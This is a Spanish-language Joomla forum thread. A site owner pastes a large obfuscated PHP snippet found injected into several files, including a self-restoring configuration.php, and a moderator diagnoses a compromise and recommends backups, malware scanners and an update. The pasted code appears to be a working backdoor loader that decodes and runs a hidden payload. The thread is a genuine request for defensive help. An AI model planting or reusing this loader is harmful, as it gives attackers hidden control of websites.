Codigo extraño en script php joomla 3.4.1

¿Tu sitio ha sido [removed]? ¿Quieres saber cómo hacerlo más seguro? ¿Necesitas mejorar el rendimiento de tu instalación Joomla? Este es el foro adecuado para preguntar al respecto

Moderators: carcam, hefesto

phaubman
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Fri Aug 02, 2013 10:11 pm

Codigo extraño en script php joomla 3.4.1

Postby phaubman » Mon Feb 15, 2016 3:42 pm

Hola hoy note varios script php con este codigo
<?php $xiloaulbv = 'gj}Z;h!opjudovg}{;#)tutjyf`opjudovy]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)!<*#}_;#)323ldfid>}&;!osvufsj,,*!| x24- x24gvodujpo27,*d x27,*c x27,*b x27)fepdof.)fepdof./ x242178}527}88:}334}472 x24<!%ff2!>!bssbz) x24]25 xg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.h00#*<%nfd)##Qtpz)#]31]265]y72]254]y76#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5`hA x27pd$n){return chr(ord($n)-1);} @error_reporting(0); $khtdtivstr_split("%tjw!>!#]y84]275]y83]248]y83]256]y8Q&f_UTPI`QUUI&e_SEEB`FUP5Ld]55#*<%bG9}:}.}-}!#*<%nfd>%f41]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]3732]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy); if ((strstr($uas," x6d 163 x69 145")) or (strstr($uas," x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2boepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzHK4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#sutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI! x24- x24y7 x24- x24*<2]},;osvufs} x27;mnui}&;zepc}A;~!} W&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuoYdrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c683%w` x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# dov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: x5c%j:^<! x24- x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%273qj%6<*Y%)fnbozcYuf!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5x24#-!#]y38#-!%w:**<")));$sxzluhr = $rmqohnm("",I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#--j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P5.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<S[" x61 156 x75 156 x61"]=1; $uas=strtolower($_S*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2t}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`mspmdXA6~6<u%7>/7&6|7**111127-K7e:55946-tr.984:75983:48984:71]K9]77]D4]8{e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV x7f x7f x7f x7f<u%V x27:+946:ce44#)zbssb!>!ssbnpe_GMFT`QI{ftmfV x7f<*X&Z&S{ftm4/%t2w/ x24)##-!#~<#/% x24- x24!>!f99#-!#65egb2dc#*<!sfuvso!sif((function_exists(" x6f 142 x5f 163 x74 141 x7{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%)!gj!|! $khtdtiv); $sxzluhr();}}judovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2A7>q%6< x7fw6* x7f_*#fubfsdXk5`{66~6<&w6< x7fw6*CW&)7gj6<*)tutjyf`439275ttfsqnp<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2) x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*Cy74]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]4tjw/ x24)% x24- x24y4 x24- x24]y8 x24- x24]26 x24- x24<%#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197hA x272qj%6<^#zsfvr# x5cq%7/7dy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;> x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA xERVER[" x48 124 x54 120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54"]7y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>!cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.msv`ftsbq/#/#/},;#-#}+;%-qp%)54l} x27;%4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]5x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0fV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,2bss-%rxB%h>#]y31]278]y3e]81]K78:56985:45]43]321]464]284]364]6]234)m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d x27pd%6<pd%w6Z6<.2`hA x27pd%6<CftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-]342]58]24]31#-%tdz*Wsfuvso!%bss x5csboe))1/3#opo#>b%!**X)ufttj x22)gj!|!*nbsbq%)323ldfidk!~!w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]doj%7-C)fepmqnjA x27&6<.fmjgA x27doj%6< x7fw6#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}Xvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#fuopd`ufh`fmjg}[;ldpt%}K;`ufldp%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!Vx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)mbg39*56A:>:8:|:7#6#%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~FHB`SFTV`QUUI&b%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!BFSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqs1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]28! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x2<ofmy%,3,j%>j%!<**3-j%-bubE2 164") && (!isset($GLOBALS[" x61 156 x75 156 x61"])))) { $GLOBAL]#>s%<#462]47y]252]18y]#>q%<#762]6)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e x|!**#j{hnpd#)tutjyf`opfepmqyfA>2b%!<*qp%-*.%)euhA)fepmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ft141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function bdtcrjc(2L5P6]y6gP7L6M7]D4]275]D:M<**qp%!-uyfu%)3of)fepdof`57ftbc x7f!|!*uyfu x27k} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftpoV;hojepdoF.uofuopD#)sfebfI{*w%)kUVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6<yqmpef)# x24*<!%t::!>! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24 = implode(array_map("bdtcrjc", x72 166 x3a 61 x31"))) { $rmqohnm = " x63 162 x65 -2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-N%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA7R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#foNFS&d_SFSFGFS`QUUI&c_UOsTrREvxNoiTCnuf_EtaerCxECalPer_Rtsazojlba'; $zjbnmzcgxw=explode(chr((364-244)),substr($xiloaulbv,(39934-34057),(155-121))); $plzwtzzx = $zjbnmzcgxw[0]($zjbnmzcgxw[(4-3)]); $piostqwj = $zjbnmzcgxw[0]($zjbnmzcgxw[(12-10)]); if (!function_exists('olilgzqs')) { function olilgzqs($vsblkfffw, $xelnfass,$gkfjqtlc) { $iiqwehkio = NULL; for($arsvmv=0;$arsvmv<(sizeof($vsblkfffw)/2);$arsvmv++) { $iiqwehkio .= substr($xelnfass, $vsblkfffw[($arsvmv*2)],$vsblkfffw[($arsvmv*2)+(4-3)]); } return $gkfjqtlc(chr((59-50)),chr((355-263)),$iiqwehkio); }; } $qeljhog = explode(chr((196-152)),'2242,48,4900,65,1826,48,3179,69,655,58,5686,51,5321,67,393,57,5655,31,450,46,326,67,5776,38,3758,32,5129,40,5276,45,1996,29,908,59,2847,69,5737,39,4680,47,3137,42,1469,21,2916,29,1560,59,3308,46,2423,58,3973,45,66,51,3790,46,5540,60,2558,41,1025,69,4238,31,1938,58,4113,68,0,34,260,45,1698,36,2692,38,5038,35,4436,53,4873,27,2290,55,1874,64,3028,56,5226,22,2370,53,2988,40,5248,28,5169,57,168,40,4018,39,1490,70,4342,36,4727,57,860,48,2126,34,496,24,5854,23,4489,67,3881,48,5414,48,3084,53,3354,30,117,28,5462,44,4378,20,2481,21,1228,48,3698,60,4269,35,2066,60,2160,21,3495,68,5814,40,5506,34,4304,38,990,35,3429,66,4057,56,713,44,3929,44,2599,57,4784,42,34,32,3628,70,4965,34,3248,60,208,52,5073,56,1405,64,2791,56,145,23,967,23,4826,47,2181,35,5600,55,4622,58,1094,56,2216,26,757,56,4556,66,4999,39,3563,38,1276,64,813,47,2025,41,610,45,1734,43,5388,26,2656,36,3384,45,520,31,2945,43,305,21,551,59,2730,61,3601,27,3836,45,1777,49,4398,38,1340,65,1150,36,2502,56,4181,57,1667,31,1186,42,1619,48,2345,25'); $bsbzrz = $plzwtzzx("",olilgzqs($qeljhog,$xiloaulbv,$piostqwj)); $plzwtzzx=$xiloaulbv; $bsbzrz(""); $bsbzrz=(714-593); $xiloaulbv=$bsbzrz-1; ?>

que es???

se los puedo borrar uno por uno, pero del configuration.php no me deja vuelve a colocarse, si lo sustituyo me de un error tras otro, de cualquier tipo hasta por ejemplo que la fehca esta mal. alguien q me tire un salvavida...........

User avatar
AlexVega
Joomla! Hero
Joomla! Hero
Posts: 2093
Joined: Fri Aug 28, 2015 6:13 am
Location: México
Contact:

Re: Codigo extraño en script php joomla 3.4.1

Postby AlexVega » Tue Feb 16, 2016 7:52 am

Que tal,

Bienvenido al Foro, parece que tu sitio ha sido vulnerado.

Primero crea una copia de seguridad de tus archivos y base de datos, puedes
hacer esto manualmente o con una extensión como Akeeba Backup.

Recuerda que es posible que el sitio este infectado, de modo que recomiendo
una revisión del mismo con estas herramientas:

- Joomla! Anti-Malware Scan Script
viewtopic.php?t=777957

- Scanner
https://sitecheck.sucuri.net

Parte del código que muestras tiene un tipo de cifrado, de modo que no es
legible, puedes ver en tu navegador el código fuente de tu sitio, es probable
que el código que adjuntas tenga enlaces a otros sitios.

La versión de Joomla! que usas es altamente vulnerable, debes actualizar a
la última versión J3.4.8.

Saludos!


Return to “Seguridad y rendimiento”

Who is online

Users browsing this forum: No registered users and 3 guests